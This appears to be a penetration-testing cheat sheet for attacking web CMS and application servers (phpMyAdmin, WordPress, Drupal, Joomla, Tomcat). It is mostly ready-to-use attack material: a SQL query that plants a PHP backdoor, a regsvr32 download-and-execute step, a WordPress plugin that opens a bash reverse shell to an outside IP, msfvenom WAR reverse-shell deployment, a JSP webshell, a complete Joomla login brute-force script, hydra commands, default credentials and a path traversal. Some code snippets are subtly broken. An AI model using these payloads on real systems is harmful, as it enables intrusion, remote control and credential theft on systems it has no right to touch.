CMS
JBOSS/JMX
python jexboss.py -host http://10.10.10.87:80PHPMyAdmin
PhpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. phpMyAdmin supports a wide
range of operations on MySQL and MariaDB. Frequently used operations (managing databases, tables, columns, relations, indexes, users,
permissions, etc) can be performed via the user interface, while you still have the ability to directly execute any SQL statement.
Prepering VM. First we have to change our config file C:\xampp\apache\conf\extra\httpd-xampp.conf and allow to remote user access our
PHP admin panel. In order to enable it we need to add "allow from 10.0.2.26" and:
<Directory "C:/xampp/">
AllowOverride AuthConfig Limit
Order allow,deny
Allow from all
Require all granted
</Directory>
After this our server is ready to be compromised.
1. Go to main XAMP page,
2. Go to phpMyAdmin,
3. Create new databse,
4. Execute SQL Query: SELECT "<?php system($_GET[‘cmd’]); ?>" into outfile “C:\\xampp\\htdocs\\backdoor.php” !!Remeber to chane "'" sings
to the new one. Because of different encoding it can cause error.
5. Now we created a new php file in main directory where HTTP resources are stored.
6. Like we can see "http://10.0.2.10/backdoor.php" exist, now we can interact with victim machine.
7. http://10.0.2.10/backdoor.php?cmd=dir will list the content of directory where PHP shell is stored.
8. Now run MSFCONSOLE.
9. We need to USE module exploits/multi/script/web_delivery.rb
IMPORTANT ! exploit/windows/misc/regsvr32_applocker_bypass_server is no longer valid. !
10. During configuration options remeber to change target:
msf exploit(multi/script/web_delivery) > show targets
Exploit targets:
Id Name
-- ----
0 Python
1 PHP
2 PSH
3 Regsvr32
4 PSH (Binary)
11. Execute command regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll using our PHP shell. Session is created.
The module creates a web server that hosts an .sct file. When the user types the provided regsvr32 command on a system,
regsvr32 will request the .sct file and then execute the included PowerShell command. This command then downloads and executes the
specified payload (similar to the web_delivery module with PSH). Both web requests (i.e., the .sct file and PowerShell download
and execute) can occur on the same port.Automatic scanners
nikto -h <URL>
python crawleet.py -u <URL> -b -d 3 -e jpg,png,css -f -m -s -x php,txt -y --threads 20Wordpress
#Enumerate all themes, all users, and all plugins
wpscan --url http://192.168.1.103/wordpress/ -e at -e ap -e u
# Scan
wpscan --rua -e --url <URL>
# Brute force user(s)
wpscan --rua --url <URL> -P <PASSWORDS_LIST> -U "<USER>,<USER>"
# wordpress
wpscan --url http://.... --log
wpscan --url http://... --enumerate u --log
wpscan --url http://<targetip> --wordlist wordlist.txt --username example_username
http://....../wp-admin
http://...../wp-content/uploads/2017/10/file.png
#SSL/TLS
wpscan --disable-tls-checks --url $url
#Enumerate Users
wpscan –url [wordpress url]–enumerate u
#BruteForce User
wpscan –url -u oscar -P /usr/share/wordlist/rockyou.txt
wpscan –url -U creds.txt -P /usr/share/wordlist/rockyou.txtWordpress Plugin
#Enumerate all themes, all users, and all plugins
wpscan --url http://192.168.1.103/wordpress/ -e at -e ap -e u
wpscan --url https://192.168.240.148:12380/blogblog/ --plugins-detection passive
wpscan --url https://192.168.240.148:12380/blogblog/ --plugins-detection aggressive
#Vulnerable plugins
wpscan --url https://192.168.240.148:12380/blogblog/ -e vp
#All plugins
wpscan --url https://192.168.240.148:12380/blogblog/ -e ap
wpscan --url http://192.168.1.206:69 -e ap --plugins-detection aggressive
#All themes
wpscan --url https://192.168.240.148:12380/blogblog/ -e at
#Config backups
wpscan --url https://192.168.240.148:12380/blogblog/ -e cb
#Vulnerable themes
wpscan --url https://192.168.240.148:12380/blogblog/ -e vt
Wordpress Manual Enum:
#Plugin Direcory
https://192.168.240.148:12380/blogblog/wp-content/plugins/
#Theme Directory
https://192.168.240.148:12380/blogblog/wp-content/themes/Wordpress panel RCE
Modifying a php from the theme used (admin credentials needed)
Appearance -> Editor -> 404 Template (at the right)
Change the content for a php shell
https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php
http://<IP>/wp-content/themes/twentytwelve/404.phpWordpress WFuzz Plugins
wfuzz -c --hc=404 -w /SecLists/Discovery/Web-Content/CMS/wp-plugins.fuzz.txt http://localhost/wp/FUZZWordPress NMAP
http-wordpress-brute.nse
http-wordpress-enum.nseWordpress panel RCE
Modifying a php from the theme used (admin credentials needed)
Appearance -> Editor -> 404 Template (at the right)
Change the content for a php shell
https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php
http://<IP>/wp-content/themes/twentytwelve/404.phpPlugin Reverse Shell
sudo rlwrap nc -lnvp 81
<?php
/**
* Plugin Name: Reverse Shell Plugin
* Plugin URI:
* Description: Reverse Shell Plugin
* Version: 1.0
* Author: Vince Matteo
* Author URI: http://www.sevenlayers.com
*/
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.86.99/81 0>&1'");
?>
zip reverse.zip ./reverse.phpDrupal
pip install droopescan
droopescan scan -u <URL>Username enumeration
In /user/register just try to create a username and if the name is already taken it will be notified :
*The name admin is already taken*
If you request a new password for an existing username :
*Unable to send e-mail. Contact the site administrator if the problem persists.*
If you request a new password for a non-existent username :
*Sorry, test is not recognized as a user name or an e-mail address.*
Accessing /user/<number> you can see the number of existing users :
- /user/1 -> Access denied (user exist)
- /user/2 -> Page not found (user doesn't exist)Hidden pages enumeration
Fuzz /node/<NUMBER> where <NUMBER> is a number (from 1 to 500 for example).
You could find hidden pages (test, dev) which are not referenced by the search engines.
wfuzz -c -z range,1-500 --hc 404 <URL>/node/FUZZDrupal panel RCE
You need the plugin php to be installed (check it accessing to /modules/php and if it returns a 403 then, exists, if not found, then the plugin php isn't installed)
Go to Modules -> (Check) PHP Filter -> Save configuration
https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php
Then click on Add content -> Select Basic Page or Article -> Write php shellcode on the body -> Select PHP code in Text format -> Select PreviewDrupal Brute Force
## Drupal bruteforce attack
#crack the password of admin
site="192.168.230.147"
id=$(curl -s http://$site/user/|grep "form_build_id" |cut -d"\"" -f6)
hydra -L userlist.txt -P /usr/share/wordlists/rockyou.txt $site http-form-post "/?q=user/:name=^USER^&pass=^PASS^&form_id=user_login&form_build_id="$id":Sorry" -V
Joomla
joomscan -u <URL>
./joomlavs.rb --url <URL> -a -vhttps://github.com/XiphosResearch/exploits/blob/master/Joomraa/joomraa.py
NMAP Joomla
http-joomla-brute.nseJoomla BruteForce Script
#!/usr/bin/python3
#Example
#python3 joomla-brute.py -u http://192.168.159.79/joomla -w creds -usr admin -v
import requests
from bs4 import BeautifulSoup
import argparse
from urllib.parse import urlparse
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
class Joomla():
def __init__(self):
self.initializeVariables()
self.sendrequest()
def initializeVariables(self):
#Initialize args
parser = argparse.ArgumentParser(description='Joomla login bruteforce')
#required
parser.add_argument('-u', '--url', required=True, type=str, help='Joomla site')
parser.add_argument('-w', '--wordlist', required=True, type=str, help='Path to wordlist file')
#optional
parser.add_argument('-p', '--proxy', type=str, help='Specify proxy. Optional. http://127.0.0.1:8080')
parser.add_argument('-v', '--verbose', action='store_true', help='Shows output.')
#these two arguments should not be together
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-usr', '--username', type=str, help='One single username')
group.add_argument('-U', '--userlist', type=str, help='Username list')
args = parser.parse_args()
#parse args and save proxy
if args.proxy:
parsedproxyurl = urlparse(args.proxy)
self.proxy = { parsedproxyurl[0] : parsedproxyurl[1] }
else:
self.proxy=None
#determine if verbose or not
if args.verbose:
self.verbose=True
else:
self.verbose=False
#http:/site/administrator
self.url = args.url+'/administrator/'
self.ret = 'aW5kZXgucGhw'
self.option='com_login'
self.task='login'
#Need cookie
self.cookies = requests.session().get(self.url).cookies.get_dict()
#Wordlist from args
self.wordlistfile = args.wordlist
self.username = args.username
self.userlist = args.userlist
def sendrequest(self):
if self.userlist:
for user in self.getdata(self.userlist):
self.username=user.decode('utf-8')
self.doGET()
else:
self.doGET()
def doGET(self):
for password in self.getdata(self.wordlistfile):
#Custom user-agent :)
headers = {
'User-Agent': 'nano'
}
#First GET for CSSRF
r = requests.get(self.url, proxies=self.proxy, cookies=self.cookies, headers=headers)
soup = BeautifulSoup(r.text, 'html.parser')
longstring = (soup.find_all('input', type='hidden')[-1]).get('name')
password=password.decode('utf-8')
data = {
'username' : self.username,
'passwd' : password,
'option' : self.option,
'task' : self.task,
'return' : self.ret,
longstring : 1
}
r = requests.post(self.url, data = data, proxies=self.proxy, cookies=self.cookies, headers=headers)
soup = BeautifulSoup(r.text, 'html.parser')
response = soup.find('div', {'class': 'alert-message'})
if response:
if self.verbose:
print(f'{bcolors.FAIL} {self.username}:{password}{bcolors.ENDC}')
else:
print(f'{bcolors.OKGREEN} {self.username}:{password}{bcolors.ENDC}')
break
@staticmethod
def getdata(path):
with open(path, 'rb+') as f:
data = ([line.rstrip() for line in f])
f.close()
return data
joomla = Joomla()
Joomla Authenticated RCE
https://www.hackingarticles.in/joomla-reverse-shell/Tomcat
Default credentials
The most interesting path of Tomcat is /manager/html, inside that path you can upload and deploy war files (execute code). But this path is protected by basic HTTP auth, the most common credentials are :
admin:admin
tomcat:tomcat
admin:<NOTHING>
admin:s3cr3t
tomcat:s3cr3t
admin:tomcatNMAP
nmap -p8080 --script=tomcat-scan.nse 192.168.54.52go-tomcat-mgmt-scanner
https://github.com/edermi/go-tomcat-mgmt-scannerBrute force
hydra -L <USERS_LIST> -P <PASSWORDS_LIST> -f <IP> http-get /manager/html -vV -uTomcat panel RCE
# Generate payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
# Upload payload
Tomcat6 :
wget 'http://<USER>:<PASSWORD>@<IP>:8080/manager/deploy?war=file:shell.war&path=/shell' -O -
Tomcat7 and above :
curl -v -u <USER>:<PASSWORD> -T shell.war 'http://<IP>:8080/manager/text/deploy?path=/shellh&update=true'
# Listener
nc -lvp <PORT>
# Execute payload
curl http://<IP>:8080/shell/Tomcat-users.xml
usr/share/tomcat9/etc/tomcat-users.xml
:http://megahosting.htb/news.php?file=../../../../../../../../../usr/share/tomcat9/etc/tomcat-users.xmlUploading WebShell
script - cmdjsp.jsp
// note that linux = cmd and windows = "cmd.exe /c + cmd"
//https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/jsp/cmdjsp.jsp
<FORM METHOD=POST ACTION='cmdjsp.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd.");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec("cmd");
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) {
output += s;
}
}
catch(IOException e) {
e.printStackTrace();
}
}
%>
<pre>
<%=output %>
</pre>
Changes to Above Script
-------POST REQUEST is Cleaner-------
#old
<FORM METHOD=GET ACTION='cmdjsp.jsp'>
#new
<FORM METHOD=POST ACTION='cmdjsp.jsp'>
-------change 32 this is because we are going against linux and not windows-------
#old
Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
#new
Process p = Runtime.getRuntime().exec("cmd);Uploading with Curl
#create war file because tomcat does not know how to process .jsp
zip cmdjsp.war cmdjsp.jspcurl -T cmdjsp.war -u 'tomcat:$3cureP4s5w0rd123!' http://10.10.10.194:8080/manager/text/deploy?path=/appIt worked
WebDav
davtest -url <URL>HTTP brute force authentication
HTTP basic authentication
# Hydra
hydra -l <USER> -V -P <PASSWORDS_LIST> -s 80 -f <IP> http-get /<URL_ENDPOINT>/ -t 15
# Patator
python patator.py http_fuzz auth_type=basic url=<URL> user_pass=FILE0 0=<USER:PASSWORD_LIST> -x ignore:code=401 -x ignore:code=307HTTP GET request
hydra <IP> -V -l <USER> -P <PASSWORDS_LIST> http-get-form "/login/:username=^USER^&password=^PASS^:F=Error:H=Cookie: safe=yes; PHPSESSID=12345myphpsessid" -t <THREADS_NUMBER>HTTP POST request
hydra -l <USER> -P <PASSWORDS_LIST> <IP> http-post-form "/webapp/login.php:username=^USER^&password=^PASS^:Invalid" -t <THREADS_NUMBER>Spidering / Brute force directories / files
gospider -d <DEPTHS> --robots --sitemap -t <THREADS> -s <URL>
ffuf -w /home/liodeus/directory-list-lowercase-2.3-medium.txt -u <URL>/FUZZ -e .php,.txt -t <THREADS>
dirbuster
Dictionaries :
- /usr/share/wordlists/dirb/common.txt
- /usr/share/wordlists/dirb/big.txt
- /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtJenkins
https://github.com/gquere/pwn_jenkinsLast updated
Was this helpful?
